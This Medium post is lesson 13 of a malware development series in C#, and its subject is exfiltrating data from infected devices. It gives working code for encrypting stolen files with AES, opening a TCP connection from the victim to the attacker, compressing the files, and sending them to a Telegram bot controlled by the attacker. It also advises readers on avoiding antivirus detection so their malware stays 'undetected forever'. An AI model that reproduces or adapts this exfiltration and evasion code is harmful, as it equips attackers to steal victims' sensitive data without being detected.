Lesson 13: Exfiltrating Data Like a Pro — Learn Advanced Techniques

👾 Malware Development Series by XIT (C#)

XIT
4 min readApr 9, 2023

Follow XIT on medium & UglyCompany on Telegram for more..

Below is the Topics List for Lesson 13:

13. Exfiltrating Data:
⇢ Encryption of Data
⇢ Establishing a Network Connection
⇢ File Packing/Unpacking
⇢ Sending Data

In this lesson, we’ll discuss advance techniques for exfiltrating data from an infected device. We will cover topics such as encrypting data, establishing a network connection, file packing/unpacking, and sending data securely to a remote server. With this knowledge, you will be able to develop a malware that can exfiltrate data undetected, allowing you to access sensitive information from your target.

Topic 1: Encryption of Data

Encrypting data is an very important step in preventing unauthorised access during transmission of the hacked user data. C# includes encryption libraries such as System.Security.Cryptography is a technique for encrypting data. In below code we will use the same library for encryption of data:

// encryption
public static void EncryptFile(string inputFile, string outputFile, string password)
{
byte[] salt = GenerateSalt();
using (RijndaelManaged aes = new RijndaelManaged())
{
aes.KeySize = 256;
aes.BlockSize = 128;
var key = new Rfc2898DeriveBytes(password, salt, 1000);
aes.Key = key.GetBytes(aes.KeySize / 8);
aes.IV = key.GetBytes(aes.BlockSize / 8);
aes.Mode = CipherMode.CFB;
using (var fileStreamInput = new FileStream(inputFile, FileMode.Open, FileAccess.Read))
using (var fileStreamOutput = new FileStream(outputFile, FileMode.Create, FileAccess.Write))
{
fileStreamOutput.Write(salt, 0, salt.Length);
using (var cryptoStream = new CryptoStream(fileStreamOutput, aes.CreateEncryptor(), CryptoStreamMode.Write))
{
byte[] buffer = new byte[1048576];
int read;
while ((read = fileStreamInput.Read(buffer, 0, buffer.Length)) > 0)
{
cryptoStream.Write(buffer, 0, read);
}
}
}
}
}

Topic 2: Establishing a Network Connection

Establishing a network connection is necessary for transmitting data between two computers or networks. In C#, you can use the TcpClient and TcpListener classes to establish network connections. In below code we will use the same library for establishing connection between the attacker desk and the victim:

// conn establish
public static void SendData(string data, string ipAddress, int port)
{
TcpClient client = new TcpClient(ipAddress, port);
NetworkStream stream = client.GetStream();
Byte[] bytes = System.Text.Encoding.ASCII.GetBytes(data);
stream.Write(bytes, 0, bytes.Length);
stream.Close();
client.Close();
}

Topic 3: File Packing/Unpacking

File packing or compression can help reduce the size of data before transmission. The System.IO.Compression namespace in C# can be used to compress or uncompress files. In below code we will use the same library for packing and compressing the stolen files:

// pack - unpack
public static void CompressFile(string sourceFile, string destinationFile)
{
using (FileStream sourceStream = new FileStream(sourceFile, FileMode.OpenOrCreate))
{
using (FileStream destinationStream = new FileStream(destinationFile, FileMode.Create))
{
using (GZipStream compressionStream = new GZipStream(destinationStream, CompressionMode.Compress))
{
sourceStream.CopyTo(compressionStream);
}
}
}
}

Topic 4: Sending Data

Finally, to send the data, you can use the network connection and any relevant file packing methods to transmit the encrypted data. In below code we will use the telegram bot to receive our stolen files:

// send to tg
async Task SendTelegramData(string token, long chatId, string text, string filePath, string caption)
{
// Create a new Telegram bot client using the token
var botClient = new TelegramBotClient(token);

// Send the text message
await botClient.SendTextMessageAsync(chatId, text);

// Send the file, if specified
if (!string.IsNullOrEmpty(filePath))
{
using (var fileStream = new FileStream(filePath, FileMode.Open, FileAccess.Read))
{
var inputFile = new InputOnlineFile(fileStream);

// Set the file caption, if specified
if (!string.IsNullOrEmpty(caption))
{
inputFile.Caption = caption;
}

// Send the file to the chat
await botClient.SendDocumentAsync(chatId, inputFile);
}
}
}
var token = "YOUR_TELEGRAM_BOT_TOKEN";
var chatId = 123456789; // Replace with the chat ID you want to send the message to
var text = "XIT here!";
var filePath = "C:\\path\\to\\file.zip"; // Replace with the path to your file
var caption = "Check out this new user data!";

await SendTelegramData(token, chatId, text, filePath, caption);

Finally, I compiled all the topics of lesson 13 & it was detected by 4 out of 26 antivirus scans.

Remember: Don’t share your unencrypted assemblies or malware source to random antivirus scanners, use the only those which are listed on the article given below to keep your malware undetected forever:

https://x-it.medium.com/stop-killing-your-malware-learn-to-perform-safe-scans-for-self-developed-malwares-fe95480a65ed

Conclusion

In this set of topics above, we covered various aspects of exfiltrating data using C# programming language. We learned how to encrypt data, establish network connections, pack and unpack files, and send data to various destinations including Telegram. By using the examples provided, you can gain a deeper understanding of these concepts and how to implement them in real-world scenarios.

A supporter is worth a thousand followers. 😊

--

--

XIT
XIT

Written by XIT

SHHH! The voice of none is stronger than the voice of one.

No responses yet